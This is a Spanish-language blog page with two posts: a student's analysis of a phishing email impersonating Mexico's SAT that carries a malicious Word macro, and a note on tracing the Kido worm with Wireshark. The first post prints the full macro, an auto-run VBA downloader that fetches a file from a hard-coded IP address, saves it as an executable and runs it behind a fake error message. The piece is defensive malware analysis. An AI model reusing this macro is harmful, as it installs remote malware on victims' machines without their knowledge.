Posts in Category: Virus

Bichitos de macros – I.

Como parte de una tarea en la escuela me dio curiosidad que es lo que sucedía con tanto correo que últimamente abunda en los buzones de los usuarios, que si correos de CFE, del SAT, de Aeroméxico ahora el ultimo que me ha llegado es uno haciendo alusión a Banamex. Por eso aquí relato el breve documento que redacte para mi tarea:

Mediante un ejemplo sencillo veremos como actúa un archivo malicioso que llega mediante correo electrónico y aprovechando la curiosidad del usuario al ejecutar el archivo este descarga un archivo malicioso.

En el ámbito informático el phishing que es la práctica de hacerse pasar por otra persona o entidad para obtener datos o causar algún daño está siendo aprovechada mediante el uso de herramientas tan tradicionales como el correo electrónico, sin embargo ya no se manda spam para ver si alguno de ellos lograba dar en el blanco, ahora ya el phishing es dirigido, mas sutil, mas concreto usando ingeniería social empieza a cambiar la forma en que se mandan estos correos por la forma en que los leemos. De miles de mensajes de spam es fácil descartar a la mayoría pero algo ya más dirigido, en concreto, usando un poco más de táctica puede ser que no sean tantos pero con más posibilidades de éxito.

Por ejemplo un correo proveniente del SAT en la cual hace mención a que tenemos problemas con nuestra situación fiscal, y cómo tener problemas con la autoridad fiscal de la nación no es poca cosa este correo aprovecha esa curiosidad de las personas por averiguar qué tan cierto es esto y es donde caen, son correos que forman parte de una campaña dirigida a los usuarios mexicanos ya que toman el nombre de empresas netamente con base nacional o instituciones gubernamentales como lo es el SAT, la CFE o Aeroméxico.

El código malicioso tiene tiempo rondando el área de la informática, si programas algo para realizar una tarea por qué no programar para realizar un tarea dañina, al fin y al cabo son programas. Hay tantos tipos de códigos maliciosos que se han creado múltiples categorías en los últimos años, se organizan en distintos rubros y también lo engloban para abarcar la mayoría de las miles de amenazas que circulan en la red, aunado a esto también las múltiples compañías que luchan contra estas mismas amenazas sacando productos, novedades de un lado y del otro.

Virus, gusanos, troyanos y ahora los famosos ransomware solo incrementan la familia de la ya larga historia de código malicioso que circula por la red, se pueden programar líneas de código en rutinas ya establecidas para aprovecharnos de algo, una base de datos, un sistema de almacenamiento de archivos, cualquier cosa está al alcance de la intrusión, modificación o destrucción mediante un código que hace su trabajo para dañar algo.

Vamos a ver un ejemplo de estos correos electrónicos que están surcando el internet.

Correo electrónico sospechoso.
Debug-SAT-2

Descargamos el archivo y lo guardamos en nuestro equipo.
Documento-01

Doble clic para ejecutar y sorpresa nos pide que habilitemos los macros del documento.
Documento-02

Incluso el documento trae todo un instructivo para hacer esto en diferentes versiones de Office y Windows.
Documento-03

Muy bien explicado.
Documento-04

Instrucciones.
Documento-05

Más instrucciones.
Documento-06

Aún mas instrucciones.
Documento-07

Seguimos con las instrucciones.
Documento-08

Si para este punto tomamos nota de las instrucciones para realizar lo que dice el documento es que de verdad nuestra curiosidad o ignorancia en temas de malware es fuerte, en este caso es curiosidad por ámbitos educativos.
Documento-09

Finalmente habilitamos los macros y tenemos una ventana de error.
Documento-10

Y se cierra el documento.
Documento-11

Pues nos mostró un error y ya, no paso nada ¿o sí? Vamos a verificar un poco el código que trae en la macro.

Debug-SAT-1

Para empezar esta algo rebuscado para ser simplemente un documento de Word, y logramos ver que hay hace referencia a una dirección IP (172.98.73.57) y a un archivo llamado logo.gif, este inofensivo archivo de Word está descargando otro archivo sin que se nos notifique esto.

El código de la macro:

Rem Attribute VBA_ModuleType=VBADocumentModule
Option VBASupport 1
Private Declare Function ShellExecuteW Lib "shell32.dll" (ByVal oeF As Long, ByVal poDsNkd As Long, ByVal BupvpYgyL As Long, ByVal BzoLj As Long, ByVal LlFlP As Long, ByVal JoW As Long) As Long
Private Declare Function URLDownloadToFileA Lib "urlmon.dll" (ByVal HBMu As Long, ByVal ir As String, ByVal DCWF As String, ByVal PeOhklz As Long, ByVal Jnofqrtmg As Long) As Long
Sub Auto_Open()
Call mmzWhqeSzl
End Sub
Sub AutoOpen()
Call mmzWhqeSzl
End Sub
Sub Workbook_Open()
Call mmzWhqeSzl
End Sub
Public Function mmzWhqeSzl() As Integer
'other publication.
Call jHfMx("http://172.98.73.57/~linuxcloud32/w/logo.gif", Environ("APPData") & "\WORD.exe")
'Oswald allegedly meets Shaw, Ferrie and other operatives of the FBI and
'1968 - Assassination of Martin Luther King, Jr., in Memphis, Tennessee,
End Function
Private Function jHfMx(tJBtHI As String, ZtcWkDhUT As String) As String
'in-law, « Gary Kirstein, allegedly an undercover E. Howard Hunt; Thornley
'survivors and witnesses before National Transportation Safety Board (NTSB)
URLDownloadToFileA 0&, tJBtHI, ZtcWkDhUT, 0&, 0&
'Cancer Institute, and the AIDS epidemic.
'76 Marc Lutter: Sie kontrollieren alles!
'with altimeter and air data computer, malfunctioning of the runway visual
ShellExecuteW 0&, StrPtr("Open"), StrPtr(ZtcWkDhUT), StrPtr(""), StrPtr(""), 1
'that should be done is to close down all laboratories in this country that are
MsgBox Chr(69) & Chr(115) & "t" & Chr(101) & Chr(32) & Chr(100) & "o" & Chr(99) & Chr(117) & Chr(109) & "e" & Chr(110) & "t" & Chr(111) & Chr(32) & "n" & Chr(111) & " " & Chr(101) & "s" & Chr(32) & Chr(99) & Chr(111) & "m" & Chr(112) & "a" & Chr(116) & "i" & "b" & "l" & Chr(101) & Chr(32) & Chr(99) & "o" & "n" & Chr(32) & Chr(101) & Chr(115) & "t" & "e" & Chr(32) & "e" & Chr(113) & Chr(117) & "i" & Chr(112) & "o" & "." & vbCrLf & vbCrLf & "P" & "o" & Chr(114) & Chr(32) & Chr(102) & "a" & Chr(118) & Chr(111) & Chr(114) & " " & "i" & Chr(110) & "t" & Chr(101) & Chr(110) & "t" & Chr(101) & Chr(32) & "d" & Chr(101) & "s" & "d" & "e" & Chr(32) & "o" & Chr(116) & Chr(114) & "o" & Chr(32) & Chr(101) & "q" & Chr(117) & "i" & Chr(112) & Chr(111) & ".", vbCritical, Chr(69) & "q" & Chr(117) & "i" & "p" & Chr(111) & " " & Chr(110) & "o" & " " & Chr(99) & Chr(111) & "m" & Chr(112) & "a" & Chr(116) & "i" & Chr(98) & Chr(108) & Chr(101)   'attack; Richard Carr, JFK assassination witness about to testify in the Clay
Application.DisplayAlerts = False
'Little Big Horn. Bell patents telephone. Otto builds four-cycle gasoline engine.
'viruses in human tissue cultures. Cedric Mims, in 1981, said in a published
Application.Quit
'Bormann's a few days after articles appear with evidence he is alive in
End Function

¿Realmente se está descargando este archivo a nuestras espaldas?, vamos a verlo con unas capturas de red que le estuvimos haciendo al equipo desde donde descargamos el archivo, y con tan solo ejecutarlo la actividad hacia esa dirección se hizo presente.

Stream-Bicho-1

Si vemos un poco dentro de la trama de TCP ahí esta la descarga del archivo “logo.gif”

Stream-Bicho-2

Analizar el archivo.

Vamos a descargar ese archivo GIF en cuestión y lo mandamos a analizar por ejemplo a la pagina de virustotal que es parte de google que nos permite analizarlo con distintos motores de antivirus.

Este muchacho dista de ser simplemente un “GIF” coqueto.
Gif-Bicho-1

Comentarios de otros usuarios acerca del archivo.
Gif-Bicho-2

Muy sencillo ¿no?, sin embargo mucha gente está cayendo con este tipo de correos dirigidos principalmente a dominios empresariales, donde aprovechando la curiosidad de los usuarios y la falta de aplicaciones de antivirus en los equipos se está aprovechando una modalidad de malware tan vieja en las computadoras personales que son: los virus de macro que implementan un archivo oculto siendo estos un troyano que puede ser la puerta a amenazas más fuertes como el ransomware.

Un buen sistema de antivirus puede ayudar y también sistemas de filtrado web donde mediante bases de datos actualizadas de direcciones IP maliciosas puede ayudar a protegernos, tener respaldos de seguridad al día aunque al final lo principal es hacer conciencia al usuario para evitar este tipo de problemas.

Seguiremos con esto.

Gusano Kido y Wireshark

Los virus, gusanos y demás son un problema nefasto una vez que caemos en las garras de uno, es común encontrar tantas fallas como soluciones existentes para estos enemigos informáticos enfocados hacia el sistema operativo mas popular del mundo: Windows.

A pesar de que Windows es un sistema con muchas fallas y virtudes, debemos reconocer que la gran mayoría de las veces el que un equipo se vea afectado por problemas de virus es por falta de actualizaciones del propio sistema, antivirus desactualizado o ausencia del mismo y la mas posible de las causas; descuido del usuario.

Si un virus o gusano se mete en tu computadora personal puede ser una tragedia, ahora si un virus logra afectar a la red de una empresa esto se traduce muchas veces en una sola cosa: perdida de dinero.

Formas de prevención hay muchas pero si por alguna razón el problema ya lo tienes encima ya sea por que tus sistemas no estaban actualizados con los parches de Microsoft para evitar esta vulnerabilidad (MS08-067, MS08-068, MS09-001) o por algún descuido en el manejo de tu antivirus, lo único que queda es actuar rápido y con algo de paciencia.

En este caso que presento a continuación despues de verificar varios equipos en la red que se encontraban infectados, y para saber en concreto que maquinas estaban propagando el virus y para dar un ejemplo util de utilización de Wireshark nos pusimos a capturar todos los paquetes en un determinado equipo y a esperar que el antivirus reportara una posible infección para verificar desde que equipo se habia originado la misma, obviamente que al ser un gusano este se encuentra por toda la red y la infección pude venir de cualquier dirección IP, sin embargo esta puede ser una manera rápida de identificar ciertos equipos y neutralizarlos rápidamente.

La alimaña en concreto es un gusano llamado Net-Worm.Win32.Kido.ih que utiliza las direcciones IP de los equipos registrados en “Mis sitios de red” para seguir propagandose, en la imagen adjunta vemos exactamente como es infectado el equipo en cuestion pero afortunadamente nuestro antivirus detecta y elimina a tiempo el gusano. Un bocado interesante para este gusano puede ser por ejemplo un servidor Windows con Active Directory, ya que toda maquina en dominio o al ingresar a este automáticamente sera infectada.

Capturando los paquetes.

Obviamente no es buena forma estar esperando equipo por equipo a que se presente algún registro que nos permita actuar, si cuentas con un sistema de administración centralizada de un antivirus lo mejor es atacar desde ahi para lanzar actualizaciones y metodos de desinfección para todos tus equipos registrados, Kaspersky cuenta con una herramienta para tal situación llamada KK (Kido Killer) que es exactamente lo que necesitas para eliminar este gusano.

Información del gusano en cuestión desde Viruslist. Link.
Metodos para la desinfección de tus equipos ya sea de manera local o mediante la consola de administración desde el sitio de Kaspersky. Link.

A pesar de todo es fascinante la manera en que estos programas se replican por toda la red aunque nosotros al menos ya estamos controlando la invasión.